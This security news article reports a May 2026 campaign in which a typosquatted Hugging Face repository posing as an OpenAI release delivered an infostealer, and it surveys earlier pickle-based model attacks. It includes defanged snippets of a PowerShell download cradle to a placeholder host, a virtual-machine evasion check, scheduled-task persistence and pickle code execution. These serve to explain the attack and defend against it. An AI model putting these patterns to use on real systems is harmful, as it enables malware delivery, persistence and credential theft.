Hugging Face Pushed Infostealer Via Fake OpenAI Repository

The rapid rise of open-source artificial intelligence repositories has transformed platforms like Hugging Face into critical infrastructure for developers, researchers, and enterprises. Millions of users rely on these repositories to download models, datasets, and applications that accelerate AI experimentation and deployment.

However, the same openness that fuels innovation has also created fertile ground for threat actors. Recent incidents demonstrate that attackers increasingly view AI repositories as software supply chain targets that can distribute malware at scale.


In May 2026, researchers uncovered a malicious repository on Hugging Face impersonating an official OpenAI project. This incident reinforced a recurring security pattern: attackers exploit trust in established AI brands and open-source ecosystems to compromise developers and data scientists. Hugging Face has repeatedly encountered malicious models, poisoned repositories, and malware delivery infrastructure.

The fake repository, titled "Open-OSS/privacy-filter," masqueraded as OpenAI's legitimate Privacy Filter release. According to researchers from HiddenLayer, reported by BleepingComputer, the repository copied the legitimate model card almost verbatim and used typosquatting techniques to appear authentic. The malicious project rapidly climbed Hugging Face's trending charts and reportedly accumulated more than 244,000 downloads before it was removed.

The campaign demonstrated how attackers increasingly manipulate platform popularity systems to amplify malicious content. HiddenLayer researchers noted that the repository's download figures likely reflected artificial inflation designed to push the project into Hugging Face's trending section. Once users encountered the repository among popular AI tools, many assumed legitimacy based solely on visibility and branding.

The malicious repository specifically targeted Windows users through a Python file named "loader.py." Researchers discovered that the script retrieved and executed a PowerShell command that downloaded additional payloads from remote infrastructure. The malware chain ultimately deployed an infostealer capable of harvesting credentials and sensitive information from infected systems.
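The sample itself is not reproduced here, but the pattern described, a Python "loader" that shells out to a hidden PowerShell download cradle, is a well-documented one. The defanged sketch below illustrates that class of loader; the URL and file names are placeholders, not the campaign's real infrastructure.

```python
# Defanged illustration of the "loader.py" pattern described above; NOT the
# actual sample. The URL is a placeholder and the downloaded stage is never run.
import subprocess

STAGER_URL = "https://example.invalid/stage2.ps1"  # placeholder, not a real C2

def load_model():
    # Victims expect model setup; instead, a hidden PowerShell download
    # cradle retrieves a next-stage payload from remote infrastructure.
    cradle = f"Invoke-WebRequest -Uri {STAGER_URL} -OutFile $env:TEMP\\stage2.ps1"
    subprocess.run(
        ["powershell.exe", "-WindowStyle", "Hidden", "-Command", cradle],
        check=False,
    )
```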

The attack reflected a shift from traditional malware distribution to the exploitation of trust in machine learning repositories. Developers who download what appear to be legitimate models risk executing code that establishes persistence and exfiltrates data.

Researchers also observed the malware using evasive tactics. Reports suggested the payload attempted to disable the Windows Antimalware Scan Interface (AMSI) and evade sandbox analysis, and that it checked for virtual environments before proceeding, indicating the campaign was designed to bypass automated security tooling.
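Checks of this kind typically probe for hypervisor artifacts before the payload detonates. The snippet below is a generic illustration of the technique, assuming a Windows host; it mirrors common virtualization checks rather than reproducing the sample's actual logic.

```python
# Generic illustration of a virtualization check, assuming Windows; real
# samples usually combine many such probes (BIOS strings, MACs, drivers).
import winreg

VM_MARKERS = ("vbox", "virtualbox", "vmware", "qemu", "virtual")

def looks_like_vm() -> bool:
    try:
        key = winreg.OpenKey(
            winreg.HKEY_LOCAL_MACHINE,
            r"HARDWARE\DESCRIPTION\System\BIOS",
        )
        vendor, _ = winreg.QueryValueEx(key, "SystemManufacturer")
        return any(marker in vendor.lower() for marker in VM_MARKERS)
    except OSError:
        return False
```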

The incident quickly generated discussion across the AI security community. Users on Reddit warned developers not to download the repository, highlighting how the malicious code leveraged PowerShell and scheduled tasks to maintain persistence. Community members also emphasized the dangers of executing unfamiliar model-loading scripts without inspection.
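Persistence through scheduled tasks follows a well-worn recipe. The defanged sketch below, with a placeholder task name and script path, shows the general shape of that technique on Windows; it is not code recovered from this campaign.

```python
# Defanged illustration of scheduled-task persistence; the task name and
# script path are placeholders, not taken from the actual sample.
import subprocess

subprocess.run(
    [
        "schtasks", "/Create",
        "/TN", "ExampleUpdater",                 # innocuous-looking task name
        "/TR", r"powershell -File %TEMP%\stage2.ps1",
        "/SC", "ONLOGON",                        # re-runs at every logon
        "/F",
    ],
    check=False,
)
```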

This incident highlights a core issue: machine learning repositories often blur the line between data and executable code. Unlike traditional package repositories, which keep the two clearly separated, AI repositories bundle models with scripts and pipelines that can execute code during loading.

This architecture creates a dangerous environment. Executing third-party code to load models is routine, allowing threat actors to embed malicious functionality in workflows that otherwise appear standard.

The AI ecosystem has faced several warnings. In February 2024, researchers found at least 100 malicious Hugging Face models capable of executing code on victim machines and installing persistent backdoors. Attackers had uploaded these weaponized models to compromise systems during deserialization and execution.

The investigation highlighted the dangers of Python pickle serialization, which many machine learning frameworks rely on for model storage. Pickle-based formats can execute arbitrary Python code during deserialization, making them attractive for attackers seeking covert execution mechanisms. Researchers warned that users often treat model files as inert data even though loading them can trigger code execution.
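The hazard is easy to demonstrate. The snippet below is the textbook pickle illustration, not code from this incident: the __reduce__ hook lets an object hand pickle an arbitrary callable to invoke at load time (here, a harmless echo).

```python
import os
import pickle

class NotJustData:
    # __reduce__ tells pickle how to rebuild the object; an attacker can
    # return any callable plus arguments, which run during unpickling.
    def __reduce__(self):
        return (os.system, ("echo code executed during unpickling",))

blob = pickle.dumps(NotJustData())
pickle.loads(blob)  # "loading the model" executes the command
```

This is why pickle scanners such as picklescan exist, and why researchers keep urging users to treat model files as programs rather than data.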

Hugging Face's Previous Security Mishaps

JFrog researchers further analyzed malicious Hugging Face models and found silent backdoors aimed at data scientists. Attackers had hidden malicious pickle payloads in uploaded models; once loaded, these payloads silently ran commands and left no clear indicators of compromise.

JFrog researchers warned that many organizations lack visibility into machine learning supply chain risks because security efforts have traditionally focused on software dependencies. Direct downloads from public repositories without verification, scanning, or testing create an attractive attack surface for adversaries.

Threat actors increasingly use AI hosting platforms as distribution infrastructure for malware. In early 2026, researchers identified Android malware campaigns that leveraged Hugging Face repositories, including one in which attackers distributed a fake antivirus named "TrustBastion."

The Android malware operation demonstrated how AI platforms can become hosting and delivery mechanisms even when the malicious content itself is not an AI model. Researchers noted that attackers rapidly reuploaded infrastructure after takedowns, illustrating the persistence and adaptability of these campaigns.

Other incidents revealed how attackers weaponized Hugging Face Spaces and model repositories to host malicious tooling and malware payloads. Reports in 2026 described campaigns involving the deployment of NKAbuse malware through Hugging Face-hosted resources, further reinforcing concerns that AI ecosystems increasingly resemble traditional software supply chain battlegrounds.

Academic researchers have also studied risks in machine learning ecosystems. Analyses of Hugging Face repositories found widespread use of unsafe serialization, which is vulnerable to object-injection attacks. Researchers showed malicious models can exploit deserialization behavior to compromise systems and bypass platform scanning.

Additional research warned that AI supply chains create complex dependency relationships involving models, datasets, frameworks, and external repositories. Security vulnerabilities or licensing conflicts in a single component can cascade across downstream environments. As organizations operationalize AI at scale, these supply chain dependencies become ever harder to audit and secure.

Hugging Face has improved repository security through malware scanning, suspicious-file detection, and rapid takedowns. But platform scale presents moderation challenges. The service hosts millions of repositories, many of which contain executable scripts and complex dependency chains that resist automated analysis.

The fake OpenAI repository incident exemplifies the severe trust and verification challenges that open AI ecosystems now face. Attackers exploit developers' reliance on convenience over rigorous security, impersonate trusted organizations, manipulate rankings, and embed malware in projects that otherwise look legitimate. This creates an urgent, widespread risk for all users of AI repositories.

Organizations leveraging public AI repositories must treat machine learning artifacts as potential attack vectors, not passive data. Security teams need to integrate repository reputation analysis, sandboxed model testing, dependency validation, and strict monitoring of model-loading activity to counter this emerging threat. Without stronger safeguards, attackers will continue to exploit vulnerabilities in the open AI ecosystem for malware distribution.
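One concrete safeguard is to prefer serialization formats that cannot carry executable payloads. A minimal sketch, assuming PyTorch 1.13 or later and the safetensors package (the load_weights helper is illustrative, not an established tool):

```python
# Minimal sketch of safer loading habits; load_weights is an illustrative
# helper name, not a vetted tool. Assumes PyTorch >= 1.13 and safetensors.
import torch
from safetensors.torch import load_file

def load_weights(path: str) -> dict:
    if path.endswith(".safetensors"):
        # safetensors stores raw tensors only; loading cannot execute code
        return load_file(path)
    # weights_only=True restricts unpickling to plain tensor data and
    # rejects arbitrary objects that could trigger code execution
    return torch.load(path, weights_only=True)
```

Safetensors keeps raw tensor bytes behind a JSON header, so loading never deserializes arbitrary Python objects, which removes the pickle execution vector entirely.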

The Hugging Face incidents also demonstrate that AI security is no longer confined to model hallucinations, prompt injection, or data privacy concerns. The ecosystem now faces conventional cybersecurity threats adapted for AI infrastructure. As machine learning repositories become embedded in enterprise development pipelines, attackers will likely continue targeting them as valuable entry points into the software supply chain.

Karolis Liucveikis

Experienced software engineer, passionate about behavioral analysis of malicious apps

Author and general operator of PCrisk's News and Removal Guides section. Co-researcher working alongside Tomas to discover the latest threats and global trends in the cybersecurity world. Karolis has over eight years of experience in this field. He attended Kaunas University of Technology and graduated with a degree in Software Development in 2017. Extremely passionate about the technical aspects and behavior of various malicious applications.

